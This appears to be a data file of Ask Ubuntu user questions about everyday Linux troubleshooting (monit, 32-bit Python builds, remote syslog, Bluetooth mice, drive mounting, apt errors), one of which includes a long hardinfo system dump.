428806	monit not starting in ubuntu	i have installed monit in my ubuntu , starting when i did root @ raaz-ubuntu : ~ # service monit start * starting daemon monitor monit but its not starting as i can see it root @ raaz-ubuntu : ~ # ps aux | grep monit root 1732 0.0 0.1 106488 1504 ? s 15:46 0:00 /usr/bin/monit -c /etc/monit/monitrc raaz 2491 0.0 0.5 302600 5232 ? sl 15:46 0:00 /usr/lib/gvfs/gvfs-udisks2-volume-monitor raaz 2509 0.0 0.2 203632 2900 ? sl 15:46 0:00 /usr/lib/gvfs/gvfs-gphoto2-volume-monitor raaz 2513 0.0 0.2 285692 2860 ? sl 15:46 0:00 /usr/lib/gvfs/gvfs-afc-volume-monitor raaz 2518 0.0 0.2 191468 2704 ? sl 15:46 0:00 /usr/lib/gvfs/gvfs-mtp-volume-monitor raaz 2898 0.0 0.4 523920 4456 ? sl 15:48 0:00 /usr/lib/x86_64-linux-gnu/deja-dup/deja-dup-monitor root 4460 0.0 0.0 13648 940 pts/6 r+ 16:36 0:00 grep -- color=auto monit i need it in port number 2812 so that i can access it .
428808	how to install 32bit python 2.7 on 64bit ubuntu 13.04	i know this question is repetitive . i read the link how can i install a 32bit python on 64 bit ubuntu but i am still failing there . i am trying to install 32bit python 2.7 downloaded from http : //www.python.org/download/releases/2.7.6/ `` gzipped source tar ball ( 2.7.6 ) ( sig ) '' . i followed the commands as per this link http : //indefinitestudies.org/2010/02/08/how-to-build-32-bit-python-on-ubuntu-9-10-x86_64/ i do installed the sudo apt-get install ia32-libs files . while executing the command cc= '' gcc -m32 '' ldflags= '' -l/lib32 -l/usr/lib32 \ -l`pwd`/lib32 -wl , -rpath , /lib32 -wl , -rpath , /usr/lib32 '' \ ./configure -- prefix=/opt/pym32 i am getting the error as : cc= '' gcc -m32 '' ldflags= '' -l/lib32 -l/usr/lib32 \ -lpwd/lib32 -wl , -rpath , /lib32 -wl , -rpath , /usr/lib32 '' \ ./configure -- prefix=/opt/pym32 checking build system type ... x86_64-unknown-linux-gnu checking host system type ... x86_64-unknown-linux-gnu checking for -- enable-universalsdk ... no checking for -- with-universal-archs ... 32-bit checking machdep ... linux2 checking extraplatdir ... checking for -- without-gcc ... no checking for gcc ... gcc -m32 checking whether the c compiler works ... no configure : error : in `/home/user/desktop/python-2.7.6 ' : configure : error : c compiler can not create executables see `config.log ' for more details i googled a lot and not getting a proper information regarding the installation of 32bit python on 64bit machine . in windows i didnât find this much harder . can anybody help me to install 32bit python on 64bit ubuntu 13.04 machine
428809	how to log firewall logs to a remote syslog server	after much reading and unsucessful attempts , i do not manage to send some of my firewall logs to a remote server . here is my setup : the remote server is a synology nas , on which the syslog server package was installed and is activated ; the nas is functional and receives properly syslog messages from other devices on the lan . the logs which i would like to send over to the synology nas are firewall logs from an ubuntu server 13.10 , on which ulogd2 is installed . i have no reasons to have doubts about : the underlying iptables rules = > the server performs as it should ( as a router with 2 network cards and packet filtering ) the relation between iptables and ulogd2 = > i have no difficulty in logging to a file ( /var/log/ulog/syslogemu ) ; logging to a file is functional using either ulog or nflog targets in the iptables script . using an iptables script with nflog targets , i checked the following in ulogd.conf : the input plugin for nflog targets is active the output plugin for syslog is active on the basis of which i uncommented the stack for logging to syslog via nflog in the original config file installed with ulogd2 from there on however , i am lost and do not know how to proceed . anyone could help ? many thanks . biloute
428810	m555b bluetooth mouse working for 1 minute	i have been trying on kubuntu 13.04 , 13.10 and now 14.04 - but always the same problem ! the mouse works with my android mobile phone . i use kubuntu 14.04 here now . when i press the `` connect '' button on my mouse , i can not find it using kde bluetooth manager , thow rfkill list tells me , it 's not blocked . so i do rfkill block bluetooth & & rfkill unblock bluetooth . now the bluetooth icon appears in de tray area . i press the `` conect '' button on the mouse , it appears in the list , and i can finish pairing . now everything works for 1 or 2 minutes , until the mouse wo n't work anymore . the tray icon still says `` connected '' . i can also see the laser sensor flashing . i am sorry i have no idea how to show the kind of bluetooth chipset i have , and also do n't know how to debug the connection . please help me ; ) david .
428811	wifi does n't work	wifi does not work after updating ubuntu 12.04 on my dell inspiron 3521 . i havenât tried anything yet . can someone help ?
428813	shrink dvd to cd	is there any program that shrinks a single layer dvd to fit onto a 700mb cd that would work on ubuntu 13.10 ? dvdsrhink only shrinks a dvd5 to 2gb approx . i would n't mind a windows program that worked under wine . thanks .
428814	need compatible usb wifi adapter for ubuntu 13.10	the computer . intel i5-4440 processor , intel db85fl motherboard on ubuntu 13.10 64bit . please suggest me a wifi usb adapter to work out of the box .
428815	resolution has changed	i started a game on steam and my resolution has changed . now i ca n't change it back . from system settings - > displays 1024x768 is maximum . how can i change it back ?
428819	mount disks at startup	i want to mount my drive just after i login . i followed an answer on stackoverflow . it asks to create a script in /etc/profile.d directory . i am pasting content of the file here # ! /bin/bash /usr/bin/udisks -- mount /dev/sda3 these commands mount my drive at /media/ < name of the drive > . when i do cd /media/media , i get permission denied . i want to mount the drive at /media/ < username > / < name of the drive > just as when i mount drives manually using gui .
428820	problem with installing updates	following error is displayed when i tried to update from the terminal as well as synaptics package manager . because of this ubuntu software center is also not opening . e : encountered a section with no package : header e : problem with mergelist /var/lib/apt/lists/security.ubuntu.com_ubuntu_dists_saucy-security_main_i18n_translation-en e : the package lists or status file could not be parsed or opened . e : _cache- > open ( ) failed , please report . how do i solve this error .
428822	on shutdown ubuntu 12.04 has trouble unmounting my ssd	on a fresh ( today ) install with ubuntu 12.04 shutdown is always un-succesfull . in the console it tells me that it is un-mounting my primary drive ( an ssd , mounted as a scsi device , where it actually is a ocz-vertex 2 sata-2 device ) on restart , everything is fine , but i am afraid i am damaging the disk wheere i now have to force a shutdown with a 6 second-push of the power button . please advice ( i am a newbie ! ) ad.1 i 've downloaded 13.10 [ 32bit ] and performed a full fresh install ( partition was deleted and a new created ) , and still ! on shutdown ubuntu stalls and hangs on the `` unmount '' of the primary disk ( the only disk , an ssd see above ) what next to try output of hardinfo 0.5.1 computer summary computer processor 2x genuine intel ( r ) cpu t2060 @ 1.60ghz memory 2054mb ( 569mb used ) operating system ubuntu 13.10 user name jaap ( jaap ) date/time ma 03 mrt 2014 20:39:18 cet display resolution 1280x800 pixels opengl renderer unknown x11 vendor the x.org foundation multimedia audio adapter hda-intel - hda intel audio adapter usb-audio - usb device 0x46d input devices power button sleep button lid switch power button at translated set 2 keyboard microsoft microsoft wireless optical mouse速 1.00 video bus uvc camera ( 046d:09a4 ) hda intel front headphone hp wmi hotkeys synps/2 synaptics touchpad printers ( cups ) samsung scsi disks matshita dvd-ram uj-850s ata ocz-vertex2 operating system version kernel linux 3.11.0-17-generic ( i686 ) compiled # 31-ubuntu smp mon feb 3 21:53:31 utc 2014 c library unknown default c compiler gnu c compiler version 4.8.1 ( ubuntu/linaro 4.8.1-10ubuntu9 ) distribution ubuntu 13.10 current session computer name v6000 user name jaap ( jaap ) home directory /home/jaap desktop environment unity ( ubuntu ) misc uptime 2 hours , 41 minutes load average 1,00 , 0,00 , 0,00 kernel modules loaded modules joydev joystick device interfaces coretemp intel core temperature monitor hp_wmi hp laptop wmi hotkeys driver sparse_keymap generic support for sparse keymaps snd_hda_codec_conexant conexant hd-audio codec snd_hda_intel intel hda driver snd_usb_audio usb audio snd_hda_codec hda codec core parport_pc pc-style parallel port driver snd_usbmidi_lib usb audio/midi helper module snd_hwdep hardware dependent layer ppdev snd_seq_midi advanced linux sound architecture sequencer midi synth . snd_seq_midi_event midi byte < - > sequencer event coder snd_seq advanced linux sound architecture sequencer . snd_rawmidi midlevel rawmidi code for alsa . r852 ricoh 85xx xd/smartmedia card reader driver rfcomm bluetooth rfcomm ver 1.11 bnep bluetooth bnep ver 1.3 microcode microcode update driver uvcvideo usb video class driver bluetooth bluetooth core ver 2.16 sm_common common smartmedia/xd functions videobuf2_vmalloc vmalloc memory handling routines for videobuf2 nand generic nand flash driver code psmouse ps/2 mouse driver snd_seq_device alsa sequencer device management videobuf2_memops common memory handling routines for videobuf2 snd_pcm midlevel pcm code for alsa . nand_ecc generic nand ecc support serio_raw raw serio driver videobuf2_core driver helper framework for video for linux 2 nand_bch nand software bch ecc support nand_ids nand device & manufacturer ids videodev device registrar for video4linux drivers v2 snd_page_alloc memory allocator for alsa system . bch binary bch encoder/decoder snd_timer alsa timer interface r592 ricoh r5c592 memstick/memstick pro card reader driver lpc_ich lpc interface for intel ich memstick sony memorystick core driver snd advanced linux sound architecture driver for soundcards . mtd core mtd registration and access routines wl lib80211 common routines for ieee802.11 drivers i915 intel graphics soundcore core sound module cfg80211 wireless configuration support video acpi video driver drm_kms_helper drm kms helper drm drm shared core routines wmi acpi-wmi mapping driver i2c_algo_bit i2c-bus bit-banging algorithm mac_hid lp parport hid_generic hid generic driver usbhid usb hid core driver hid ahci ahci sata low-level driver libahci common ahci sata low-level routines sdhci_pci secure digital host controller interface pci driver e100 intel ( r ) pro/100 network driver sdhci secure digital host controller interface core driver firewire_ohci driver for pci ohci ieee1394 controllers mii mii hardware support library firewire_core core ieee1394 transaction logic crc_itu_t crc itu-t v.41 calculations boots boots mon mar 3 17:5 3..11.0-17-generi|- mon mar 3 15:3 3..11.0-17-generi|- mon mar 3 15:2 3..11.0-17-generi|- mon mar 3 15:1 3..11.0-12-generi|- languages available languages en_ag english language locale for antigua and barbuda en_ag.utf8 english language locale for antigua and barbuda en_au.utf8 english locale for australia en_bw.utf8 english locale for botswana en_ca.utf8 english locale for canada en_dk.utf8 english locale for denmark en_gb.utf8 english locale for britain en_hk.utf8 english locale for hong kong en_ie.utf8 english locale for ireland en_in english language locale for india en_in.utf8 english language locale for india en_ng english locale for nigeria en_ng.utf8 english locale for nigeria en_nz.utf8 english locale for new zealand en_ph.utf8 english language locale for philippines en_sg.utf8 english language locale for singapore en_us.utf8 english locale for the usa en_za.utf8 english locale for south africa en_zm english locale for zambia en_zm.utf8 english locale for zambia en_zw.utf8 english locale for zimbabwe nl_aw dutch language locale for aruba nl_aw.utf8 dutch language locale for aruba nl_be.utf8 dutch locale for belgium nl_nl.utf8 dutch locale for the netherlands filesystems mounted file systems /dev/sda1 / 8,76 % ( 98,5 gib of 107,9 gib ) none /sys/fs/cgroup 0,00 % ( 4,0 kib of 4,0 kib ) udev /dev 0,00 % ( 994,8 mib of 994,8 mib ) tmpfs /run 0,55 % ( 199,6 mib of 200,7 mib ) none /run/lock 0,00 % ( 5,0 mib of 5,0 mib ) none /run/shm 0,02 % ( 1003,2 mib of 1003,4 mib ) none /run/user 0,09 % ( 99,9 mib of 100,0 mib ) display display resolution 1280x800 pixels vendor the x.org foundation version 1.14.5 monitors monitor 0 1280x800 pixels extensions big-requests composite damage double-buffer dpms dri2 glx generic event extension mit-screen-saver mit-shm randr record render security sgi-glx shape sync x-resource xc-misc xfixes xfree86-dga xfree86-vidmodeextension xinerama xinputextension xkeyboard xtest xvideo xvideo-motioncompensation opengl vendor unknown renderer unknown version unknown direct rendering no environment variables environment variables gnome_keyring_pid 1493 user jaap language nl upstart_instance xdg_seat seat0 textdomain im-config compiz_config_profile ubuntu ssh_agent_pid 1570 session ubuntu home /home/jaap qt4_im_module xim desktop_session ubuntu xdg_seat_path /org/freedesktop/displaymanager/seat0 gtk_modules overlay-scrollbar : unity-gtk-module instance dbus_session_bus_address unix : abstract=/tmp/dbus-bfrfd5mr1v gnome_keyring_control /run/user/1000/keyring-baiudb ubuntu_menuproxy 1 mandatory_path /usr/share/gconf/ubuntu.mandatory.path im_config_phase 1 sessiontype gnome-session upstart_job gnome-session logname jaap gtk_im_module ibus defaults_path /usr/share/gconf/ubuntu.default.path xdg_session_id c2 gnome_desktop_session_id this-is-deprecated path /usr/lib/lightdm/lightdm : /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games : /usr/local/games gdm_lang nl xdg_session_path /org/freedesktop/displaymanager/session0 xdg_runtime_dir /run/user/1000 display :0 xdg_current_desktop unity lang nl_nl.utf-8 xauthority /home/jaap/.xauthority xmodifiers @ im=ibus ssh_auth_sock /run/user/1000/keyring-baiudb/ssh shell /bin/bash gdmsession ubuntu upstart_events started xsession textdomaindir /usr/share/locale/ upstart_session unix : abstract=/com/ubuntu/upstart-session/1000/1495 xdg_vtnr 7 pwd /home/jaap xdg_config_dirs /etc/xdg/xdg-ubuntu : /usr/share/upstart/xdg : /etc/xdg xdg_data_dirs /usr/share/ubuntu : /usr/share/gnome : /usr/local/share/ : /usr/share/ clutter_im_module xim job dbus xdg_menu_prefix gnome- session_manager local/v6000 : @ /tmp/.ice-unix/1641 , unix/v6000 : /tmp/.ice-unix/1641 gpg_agent_info /run/user/1000/keyring-baiudb/gpg:0:1 gio_launched_desktop_file /usr/share/applications/hardinfo.desktop gio_launched_desktop_file_pid 4027 compiz_bin_path /usr/bin/ users users root root daemon daemon bin bin sys sys sync sync games games man man lp lp mail mail news news uucp uucp proxy proxy www-data www-data backup backup list mailing list manager irc ircd gnats gnats bug-reporting system ( admin ) nobody nobody libuuid syslog messagebus usbmux usbmux daemon dnsmasq dnsmasq avahi-autoipd avahi autoip daemon kernoops kernel oops tracking daemon rtkit realtimekit whoopsie speech-dispatcher speech dispatcher avahi avahi mdns daemon lightdm light display manager pulse pulseaudio daemon hplip hplip system user colord colord colour management daemon saned jaap jaap devices processor processors genuine intel ( r ) cpu t2060 @ 1.60ghz 1600,00mhz genuine intel ( r ) cpu t2060 @ 1.60ghz 1600,00mhz memory memory total memory 2054876 kb free memory 455384 kb buffers 79544 kb cached 1030824 kb cached swap 0 kb active 683736 kb inactive 840040 kb active ( anon ) 414748 kb inactive ( anon ) 202908 kb active ( file ) 268988 kb inactive ( file ) 637132 kb unevictable 48 kb mlocked 48 kb high memory 1173960 kb free high memory 15056 kb low memory 880916 kb free low memory 440328 kb virtual memory 2085884 kb free virtual memory 2085884 kb dirty 40 kb writeback 0 kb anonpages 413720 kb mapped 177156 kb shmem 204028 kb slab 44888 kb sreclaimable 30016 kb sunreclaim 14872 kb kernelstack 3400 kb pagetables 9064 kb nfs_unstable 0 kb bounce 0 kb writebacktmp 0 kb commitlimit 3113320 kb committed_as 3625944 kb vmalloctotal 122880 kb vmallocused 16080 kb vmallocchunk 104532 kb hardwarecorrupted 0 kb anonhugepages 0 kb hugepages_total 0 hugepages_free 0 hugepages_rsvd 0 hugepages_surp 0 hugepagesize 2048 kb directmap4k 16376 kb directmap2m 897024 kb pci devices pci devices host bridge intel corporation mobile 945gm/pm/gms , 943/940gml and 945gt express memory controller hub ( rev 03 ) vga compatible controller intel corporation mobile 945gm/gms , 943/940gml express integrated graphics controller ( rev 03 ) ( prog-if 00 [ vga controller ] ) display controller intel corporation mobile 945gm/gms/gme , 943/940gml express integrated graphics controller ( rev 03 ) audio device intel corporation nm10/ich7 family high definition audio controller ( rev 02 ) pci bridge intel corporation nm10/ich7 family pci express port 1 ( rev 02 ) ( prog-if 00 [ normal decode ] ) pci bridge intel corporation nm10/ich7 family pci express port 2 ( rev 02 ) ( prog-if 00 [ normal decode ] ) usb controller intel corporation nm10/ich7 family usb uhci controller # 1 ( rev 02 ) ( prog-if 00 [ uhci ] ) usb controller intel corporation nm10/ich7 family usb uhci controller # 2 ( rev 02 ) ( prog-if 00 [ uhci ] ) usb controller intel corporation nm10/ich7 family usb uhci controller # 3 ( rev 02 ) ( prog-if 00 [ uhci ] ) usb controller intel corporation nm10/ich7 family usb uhci controller # 4 ( rev 02 ) ( prog-if 00 [ uhci ] ) usb controller intel corporation nm10/ich7 family usb2 ehci controller ( rev 02 ) ( prog-if 20 [ ehci ] ) pci bridge intel corporation 82801 mobile pci bridge ( rev e2 ) ( prog-if 01 [ subtractive decode ] ) isa bridge intel corporation 82801gbm ( ich7-m ) lpc interface bridge ( rev 02 ) ide interface intel corporation 82801g ( ich7 family ) ide controller ( rev 02 ) ( prog-if 8a [ master secp prip ] ) sata controller intel corporation 82801gbm/ghm ( ich7-m family ) sata controller [ ahci mode ] ( rev 02 ) ( prog-if 01 [ ahci 1.0 ] ) smbus intel corporation nm10/ich7 family smbus controller ( rev 02 ) network controller broadcom corporation bcm4311 802.11b/g wlan ( rev 01 ) usb controller nec corporation upd720200 usb 3.0 host controller ( rev 04 ) ( prog-if 30 [ xhci ] ) firewire ( ieee 1394 ) ricoh co ltd r5c832 ieee 1394 controller ( prog-if 10 [ ohci ] ) sd host controller ricoh co ltd r5c822 sd/sdio/mmc/ms/mspro host adapter ( rev 19 ) system peripheral ricoh co ltd r5c592 memory stick bus host adapter ( rev 0a ) system peripheral ricoh co ltd xd-picture card controller ( rev 05 ) ethernet controller intel corporation pro/100 ve network connection ( rev 02 ) usb devices printers printers ( cups ) samsung battery no batteries no batteries found on this system sensors input devices input devices power button sleep button lid switch power button at translated set 2 keyboard microsoft microsoft wireless optical mouse速 1.00 video bus uvc camera ( 046d:09a4 ) hda intel front headphone hp wmi hotkeys synps/2 synaptics touchpad storage scsi disks matshita dvd-ram uj-850s ata ocz-vertex2 dmi bios date 03/22/2010 vendor hewlett-packard ( www.hp.com ) version f.2e board name 30bb vendor quanta resources i/o ports 0000-0cf7 pci bus 0000:00 0000-001f dma1 0020-0021 pic1 0040-0043 timer0 0050-0053 timer1 0060-0060 keyboard 0062-0062 ec data 0064-0064 keyboard 0066-0066 ec cmd 0070-0077 rtc0 0080-008f dma page reg 00a0-00a1 pic2 00c0-00df dma2 00f0-00ff fpu 0170-0177 intel corporation 82801g ( ich7 family ) ide controller ( rev 02 ) ( prog-if 8a [ master secp prip ] ) 0170-0177 ata_piix 01f0-01f7 intel corporation 82801g ( ich7 family ) ide controller ( rev 02 ) ( prog-if 8a [ master secp prip ] ) 01f0-01f7 ata_piix 0376-0376 intel corporation 82801g ( ich7 family ) ide controller ( rev 02 ) ( prog-if 8a [ master secp prip ] ) 0376-0376 ata_piix 0380-0383 pnp 00:05 03f6-03f6 intel corporation 82801g ( ich7 family ) ide controller ( rev 02 ) ( prog-if 8a [ master secp prip ] ) 03f6-03f6 ata_piix 0680-069f pnp 00:05 06a0-06af pnp 00:06 06b0-06ff pnp 00:06 0800-080f pnp 00:05 0cf8-0cff pci conf1 0d00-ffff pci bus 0000:00 1000-1003 acpi pm1a_evt_blk 1004-1005 acpi pm1a_cnt_blk 1008-100b acpi pm_tmr 1010-1015 acpi cpu throttle 1020-1020 acpi pm2_cnt_blk 1028-102f acpi gpe0_blk 1030-1033 itco_wdt 1060-107f itco_wdt 1180-11bf intel corporation 82801gbm ( ich7-m ) lpc interface bridge ( rev 02 ) 1180-11bf pnp 00:05 1640-164f pnp 00:05 1800-1807 intel corporation mobile 945gm/gms , 943/940gml express integrated graphics controller ( rev 03 ) ( prog-if 00 [ vga controller ] ) 1810-181f intel corporation 82801g ( ich7 family ) ide controller ( rev 02 ) ( prog-if 8a [ master secp prip ] ) 1810-181f ata_piix 1820-183f intel corporation nm10/ich7 family usb uhci controller # 1 ( rev 02 ) ( prog-if 00 [ uhci ] ) 1820-183f uhci_hcd 1840-185f intel corporation nm10/ich7 family usb uhci controller # 2 ( rev 02 ) ( prog-if 00 [ uhci ] ) 1840-185f uhci_hcd 1860-187f intel corporation nm10/ich7 family usb uhci controller # 3 ( rev 02 ) ( prog-if 00 [ uhci ] ) 1860-187f uhci_hcd 1880-189f intel corporation nm10/ich7 family usb uhci controller # 4 ( rev 02 ) ( prog-if 00 [ uhci ] ) 1880-189f uhci_hcd 18b0-18bf intel corporation 82801gbm/ghm ( ich7-m family ) sata controller [ ahci mode ] ( rev 02 ) ( prog-if 01 [ ahci 1.0 ] ) 18b0-18bf ahci sata low-level driver 18c0-18c3 intel corporation 82801gbm/ghm ( ich7-m family ) sata controller [ ahci mode ] ( rev 02 ) ( prog-if 01 [ ahci 1.0 ] ) 18c0-18c3 ahci sata low-level driver 18c4-18c7 intel corporation 82801gbm/ghm ( ich7-m family ) sata controller [ ahci mode ] ( rev 02 ) ( prog-if 01 [ ahci 1.0 ] ) 18c4-18c7 ahci sata low-level driver 18c8-18cf intel corporation 82801gbm/ghm ( ich7-m family ) sata controller [ ahci mode ] ( rev 02 ) ( prog-if 01 [ ahci 1.0 ] ) 18c8-18cf ahci sata low-level driver 18d0-18d7 intel corporation 82801gbm/ghm ( ich7-m family ) sata controller [ ahci mode ] ( rev 02 ) ( prog-if 01 [ ahci 1.0 ] ) 18d0-18d7 ahci sata low-level driver 18e0-18ff intel corporation nm10/ich7 family smbus controller ( rev 02 ) 2000-2fff pci bus 0000:02 3000-3fff pci bus 0000:03 4000-4fff pci bus 0000:05 4000-403f intel corporation pro/100 ve network connection ( rev 02 ) 4000-403f intel ( r ) pro/100 network driver memory 00000000-00000fff reserved 00001000-0009f7ff system ram 0009f800-0009ffff reserved 000a0000-000bffff pci bus 0000:00 000a0000-000bffff video ram area 000c0000-000c7fff video rom 000ce800-000cffff adapter rom 000d0000-000d3fff pci bus 0000:00 000d4000-000d7fff pci bus 0000:00 000d8000-000dbfff pci bus 0000:00 000dc000-000fffff reserved 000f0000-000fffff system rom 00100000-7f66ffff system ram 01000000-016363a3 kernel code 016363a4-0197227f kernel data 01a56000-01b38fff kernel bss 7f670000-7f6fffff acpi non-volatile storage 7f700000-7fffffff reserved 80000000-febfffff pci bus 0000:00 80000000-80000fff intel flush page c0000000-cfffffff intel corporation mobile 945gm/gms , 943/940gml express integrated graphics controller ( rev 03 ) ( prog-if 00 [ vga controller ] ) d0000000-d1ffffff pci bus 0000:02 d2000000-d3ffffff pci bus 0000:03 d4000000-d5ffffff pci bus 0000:02 d4000000-d4003fff broadcom corporation bcm4311 802.11b/g wlan ( rev 01 ) d6000000-d7ffffff pci bus 0000:03 d6000000-d6001fff nec corporation upd720200 usb 3.0 host controller ( rev 04 ) ( prog-if 30 [ xhci ] ) d6000000-d6001fff xhci_hcd d8000000-d80fffff pci bus 0000:05 d8000000-d8000fff intel corporation pro/100 ve network connection ( rev 02 ) d8000000-d8000fff intel ( r ) pro/100 network driver d8001000-d80017ff ricoh co ltd r5c832 ieee 1394 controller ( prog-if 10 [ ohci ] ) d8001000-d80017ff driver for pci ohci ieee1394 controllers d8001800-d80018ff ricoh co ltd r5c822 sd/sdio/mmc/ms/mspro host adapter ( rev 19 ) d8001800-d80018ff mmc0 d8002000-d80020ff ricoh co ltd r5c592 memory stick bus host adapter ( rev 0a ) d8002000-d80020ff ricoh r5c592 memstick/memstick pro card reader driver d8002400-d80024ff ricoh co ltd xd-picture card controller ( rev 05 ) d8002400-d80024ff ricoh 85xx xd/smartmedia card reader driver d8100000-d817ffff intel corporation mobile 945gm/gms , 943/940gml express integrated graphics controller ( rev 03 ) ( prog-if 00 [ vga controller ] ) d8180000-d81fffff intel corporation mobile 945gm/gms/gme , 943/940gml express integrated graphics controller ( rev 03 ) d8200000-d823ffff intel corporation mobile 945gm/gms , 943/940gml express integrated graphics controller ( rev 03 ) ( prog-if 00 [ vga controller ] ) d8240000-d8243fff intel corporation nm10/ich7 family high definition audio controller ( rev 02 ) d8240000-d8243fff ich hd audio d8444000-d84443ff intel corporation nm10/ich7 family usb2 ehci controller ( rev 02 ) ( prog-if 20 [ ehci ] ) d8444000-d84443ff ehci_hcd d8444400-d84447ff intel corporation 82801gbm/ghm ( ich7-m family ) sata controller [ ahci mode ] ( rev 02 ) ( prog-if 01 [ ahci 1.0 ] ) d8444400-d84447ff ahci sata low-level driver e0000000-efffffff pci mmconfig 0000 [ bus 00-ff ] e0000000-efffffff reserved e0000000-efffffff pnp 00:00 e0000000-efffffff pnp 00:01 fec00000-fec0ffff reserved fec00000-fec003ff ioapic 0 fed00000-fed003ff hpet 0 fed00000-fed003ff reserved fed00000-fed003ff pnp 00:03 fed14000-fed19fff reserved fed14000-fed17fff pnp 00:01 fed18000-fed18fff pnp 00:01 fed19000-fed19fff pnp 00:01 fed1c000-fed8ffff reserved fed1c000-fed1ffff pnp 00:01 fed1f410-fed1f414 itco_wdt fed20000-fed3ffff pnp 00:01 fed40000-fed44fff pnp 00:01 fed45000-fed8ffff pnp 00:01 fee00000-fee00fff local apic fee00000-fee00fff reserved ff000000-ffffffff reserved dma 4 cascade network interfaces network interfaces lo 0,08mib 0,08mib 127.0.0.1 eth0 345,40mib 9,11mib 192.168.2.57 ip connections connections 127.0.1.1:53 0.0.0.0 : * udp 127.0.0.1:631 listen 0.0.0.0 : * tcp 192.168.2.57:49617 established 95.100.97.27:80 tcp 192.168.2.57:51051 established 68.232.35.121:443 tcp 192.168.2.57:51053 established 68.232.35.121:443 tcp 192.168.2.57:54570 established 192.168.2.137:139 tcp 192.168.2.57:39066 established 192.168.2.137:445 tcp 192.168.2.57:38532 established 198.252.206.25:80 tcp 192.168.2.57:51050 established 68.232.35.121:443 tcp 192.168.2.57:40882 established 198.252.206.25:443 tcp 192.168.2.57:45419 established 74.125.136.138:80 tcp 192.168.2.57:54567 established 192.168.2.137:139 tcp 192.168.2.57:51052 established 68.232.35.121:443 tcp 192.168.2.57:44168 established 91.189.89.76:443 tcp 192.168.2.57:54569 established 192.168.2.137:139 tcp 192.168.2.57:54071 close_wait 91.189.94.25:80 tcp 127.0.1.1:53 0.0.0.0 : * udp 0.0.0.0:68 0.0.0.0 : * udp 0.0.0.0:631 0.0.0.0 : * udp 0.0.0.0:5353 0.0.0.0 : * udp 0.0.0.0:46958 0.0.0.0 : * udp 0.0.0.0:57867 0.0.0.0 : * udp : ::51905 : : : * udp6 : ::5353 : : : * udp6 : ::26481 : : : * udp6 routing table ip routing table 0.0.0.0 / 192.168.2.1 0.0.0.0 ug eth0 192.168.2.0 / 0.0.0.0 255.255.255.0 u eth0 arp table arp table 192.168.2.137 00:11:32:1b : c2:69 eth0 192.168.2.1 c8 : fb:26 : e1:37:15 eth0 dns servers name servers 127.0.1.1 statistics ip 251425 total packets received 0 incoming packets discarded 0 incoming packets discarded 250378 incoming packets delivered 131132 requests sent out 4 outgoing packets dropped icmp 8 icmp messages received 0 icmp messages failed 54 icmp messages sent 0 icmp messages failed icmpmsg tcp 198 active connections openings 0 bad segments received . 1 connection resets received 1 connection resets received 13 connections established 246207 segments received 129618 segments send out 56 segments retransmited 0 bad segments received . 125 resets sent udp 1266 packets received 54 packets to unknown port received . 0 packet receive errors 1325 packets sent udplite tcpext 68 tcp sockets finished time wait in fast timer 1176 delayed acks sent 374 packets directly queued to recvmsg prequeue . 1834656 bytes directly in process context from backlog 506822 bytes directly received in process context from prequeue 234184 packet headers predicted 1771 packets header predicted and directly queued to user 353 acknowledgments not containing data payload received 2818 predicted acknowledgments 5 fast retransmits 4 congestion windows fully recovered without slow start 5 fast retransmits 9 other tcp timeouts 8 dsacks sent for old packets 2 dsacks received 21 connections reset due to unexpected data 1 connections reset due to early user close 6 connections aborted due to timeout ipext shared directories samba nfs benchmarks cpu blowfish cpu blowfish this machine 1600 mhz 11,487 intel ( r ) celeron ( r ) m processor 1.50ghz ( null ) 26.1876862 powerpc 740/750 ( 280.00mhz ) ( null ) 172.816713 cpu cryptohash cpu cryptohash this machine 1600 mhz 94,527 cpu fibonacci cpu fibonacci this machine 1600 mhz 6,701 intel ( r ) celeron ( r ) m processor 1.50ghz ( null ) 8.1375674 powerpc 740/750 ( 280.00mhz ) ( null ) 58.07682 cpu n-queens cpu n-queens this machine 1600 mhz 26,710 fpu fft fpu fft this machine 1600 mhz 6,043 fpu raytracing fpu raytracing this machine 1600 mhz 57,752 intel ( r ) celeron ( r ) m processor 1.50ghz ( null ) 40.8816714 powerpc 740/750 ( 280.00mhz ) ( null ) 161.312647
428823	ubuntu 12.04 starting on terminal	well , today i started my ubuntu 12.04 laptop but it does n't load ! ! ! ! it ends up in a black screen ( terminal ) with my user name asking for my user and password i press startx and it says the program 'startx ' is currently not installed ! ! ! ! ! ! i tried a couple of times more and it showed ' could not write bytes broken pipe ' instead of the login terminal . anyone can help ? ? why is that happening ? ps . ubuntu was loading on minimum brightness so i followed this screen brightness reset to minimum after every reboot instruction from answer 2 which means i made a custom file customsetbootbrightness.conf to fix it , has that anything to do with it ? ps.2 i have intel hd graphics
428824	arduino serial port not found	i 'm on xububtu 13.10 64 bit . i installed arduino ide from the software . i have arduino uno board . when i try to execute any code , i get this error is there a driver missing ?
428825	how to install ubuntu on toshiba satellite d50a ?	i have tried everything including formatting hd , bios changes , etc . it tries to load then quits ! xubuntu almost installs till the very end then i get grub-efi-amd84-signed into/target/ error and says ca n't boot . ubuntu is the preferred option . thanks so much !
428826	which extra packages or modules should i remove at compiling time	i 'm a newbie in compiling the kernel from kernel.org sources.when i compile kernel at my machine which extra or old packages or modules should i remove ? thanks in advance .
428828	upload images to imgur account from shutter	i use shutter for screenshots , it has an option to upload to imgur as a guest , is it possible to upload to my account instead ?
428830	could n't see other drive on ubuntu	i have a desktop with two drives , an ssd and an hdd . i have installed ubuntu desktop 12.04 on ssd . however , when i login , i could n't see hdd drive . what steps should i follow ? how should i format hdd and use it while my os is on ssd . i am also open any recommendation to manage the drives in most efficient way ( e.g . where to use hdd and where i need ssd most . initially , boot time of os seems quite important to me , so the os is on ssd . ) thanks
428831	logitec v450 cordless laser mouse problem	ubuntu 13.10 mouse : logitec v450 cordless laser mouse . problems : on the desktop my mouse always make a double click by right button so it is always create new map icon : s it is crazy ! ! ! in the firefox it is make the other mistake : i am always losing the jump menu on the links when i would like open it on the new page . i usually can try 3-4 times to working well on each links . but my mouse is working well in chrome . i do n't understand it . someone has already encountered the same problem ? pls help or i will have to reinstall the windows . ubuntu is very simphatic for be and it would be better than windows but this problems is very frustrating for me ... pls help me ! my mouse worked well on the windows 2 days ago ...
428840	switching between server and client	i am pretty new to ubuntu.i know that on installing ubuntu server i can install desktop version or gui on it.my questions are following . will that new gui will now act as server or client ? if yes then how to switch between the two ? if i am wrong then please guide me how to have both server and desktop versions on the same machine or what is the best practice ? regards
